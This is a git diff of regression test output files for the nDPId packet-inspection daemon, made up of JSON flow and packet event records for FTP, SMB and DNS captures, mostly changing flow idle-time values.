-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} -00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 
+00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1574361625864,"flow_last_seen":1574361625864,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1574361625864,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1574361625864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625864,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACgGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbUAAAAAoAJwgHzLAAACBAWgBAIICpYFXqIAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1574361625878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1574361625878,"pkt":"ZABqYzXM9LUv\/K\/wht1gC1mOACgGOioACAAQEAAAAAAAAAAAAAEqAA1AAAEAAwGSABIBkwARABWutHAVBmyZN0G2oBL\/\/zbpAAACBAWgBAIIClbTSMOWBV6iAQMDDg=="} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1574361625878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1574361625878,"pkt":"9LUv\/K\/wZABqYzXMht1gC5eXACAGQCoADUAAAQADAZIAEgGTABEqAAgAEBAAAAAAAAAAAAABrrQAFZk3QbZwFQZtgBAA4XzDAAABAQgKlgVesFbTSMM="} +00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1574361625864,"flow_last_seen":1574361631296,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1574361631296,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"},"ftp": {"user":"hello","password":"","auth_failed":1}} +00819{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1574361625864,"flow_last_seen":1574361633102,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1574361633102,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:192:12:193:11","dst_ip":"2a00:800:1010::1","src_port":44724,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"FTP_CONTROL","breed":"Unsafe","category":"Download"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":18,"source":"ftp_failed.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":18,"total-skipped-flows":0,"total-l4-data-len":136,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1574361633102} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 18/18 diff --git a/test/results/fuzz-2006-06-26-2594.pcap.out b/test/results/fuzz-2006-06-26-2594.pcap.out index e6b99af24..570b152b0 100644 --- a/test/results/fuzz-2006-06-26-2594.pcap.out +++ b/test/results/fuzz-2006-06-26-2594.pcap.out 
@@ -66,15 +66,15 @@ 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00724{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1120469595096,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":1120469595096,"pkt":"3\/\/\/\/\/\/\/AODtAW69CABFAADlaaMAAIARTBPAqAECwKgB+wCKAIoA0VtoEQ6E7MCoAQIAigC7AACqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":34,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469595096,"flow_last_seen":1120469595096,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"thread_ts_msec":1120469595096,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.251","src_port":138,"dst_port":138,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaVAAIAGJpHAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaaZAADgGJpDAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaadAAIAGJo\/AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 
-00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 
+00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2717,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaRAAIAGJpLAqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469611651,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469611651,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.137.21.94","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1120469611651,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469611651,"pkt":"ADBUADRWAODtAW69CABFAAAwaaVAAIAGJpHAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaaZAADgGJpDAqAECk4kVXgqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1120469614570,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469614570,"pkt":"ADBUADRWAODtAW69CABFAAAwaadAAIAGJo\/AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 
+00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469620579,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469620579,"l3_proto":"ip4","src_ip":"192.168.1.71","dst_ip":"147.137.21.122","src_port":2718,"dst_port":139,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaahAAIAGJo7AqAFHk4kVegqeAIstxX7gAAAAAHACQAAgvwAAAgQFtAEBBAI="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1120469620579,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469620579,"pkt":"ADBUADRWAODtAW69CABFAAAwaalAAIAGJo3AqAECk4kVXgqdAb3Y\/7fcAAAAAHACQAA7VwAAAgQFtAEBBAI="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1120469632829,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":75,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":75,"pkt_l4_len":41,"thread_ts_msec":1120469632829,"pkt":"ADBUADRWAODtAW69CABFAAA9aaoAAIARTbLAcgECwKgBAQqfADUAKUpe7dQBAAABgAAAUgAAA2Z0cAdlY2l0ZexlA2NvbQAAAQAB"} 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":41,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469632829,"flow_last_seen":1120469632829,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469632829,"l3_proto":"ip4","src_ip":"192.114.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecite?e.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -83,62 +83,62 @@ 00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469633828,"flow_last_seen":1120469633828,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1120469633828,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"ftp.ecitele.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1120469634840,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1120469634840,"pkt":"AODtAW69ADBUADRWCABFAACaAABAAEARtv\/AqAEBwKgBAgA1Cp8Ahtfh7dSBgAABAAKzAgABA2Z0cLxlY2l0ZexlA2NvbQAAAQABwAwABQABAAAC9QAGA2Ruc8AQwC0AAQABAAAAIQAEk+oB\/cAQAAIAAQAAA0MAEQJucwViYXJhawNuZXQCaWwAwBAAAgABAAADQwACwC3ATwABAGoAAAARAATUljCp"} 
00887{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":43,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469633828,"flow_last_seen":1120469634840,"flow_idle_time":180000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":159,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1120469634840,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2719,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"147.234.1.253"}} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} 
+00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469634878,"flow_last_seen":1120469634878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1120469634878,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"147.234.1.253","src_port":2720,"dst_port":21,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1120469634878,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1120469634878,"pkt":"ADBUAHNWAODtAW69CABFAAAwaaxAAIAGOYrAqAECk+oB\/QqgABWvnVkPAABkAHACQABuKwAAAgQFtAEBBAI="} 00195{"error_event_id":2,"error_event_name":"Unknown L3 protocol","datalink":1,"packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1120469634896} 00366{"packet_event_id":1,"packet_event_name":"packet","packet_id":45,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":62,"pkt_l4_len":0,"thread_ts_msec":1120469634878,"pkt":"AODtAW69ADBUADRWCABVAAAweP9AADkGcTeT6gH9wKgBAgAVCqDlH5UEr53DEHASYzbQ8AAAAQEEAgIEBYM="} 00215{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":46,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1120469634896} 
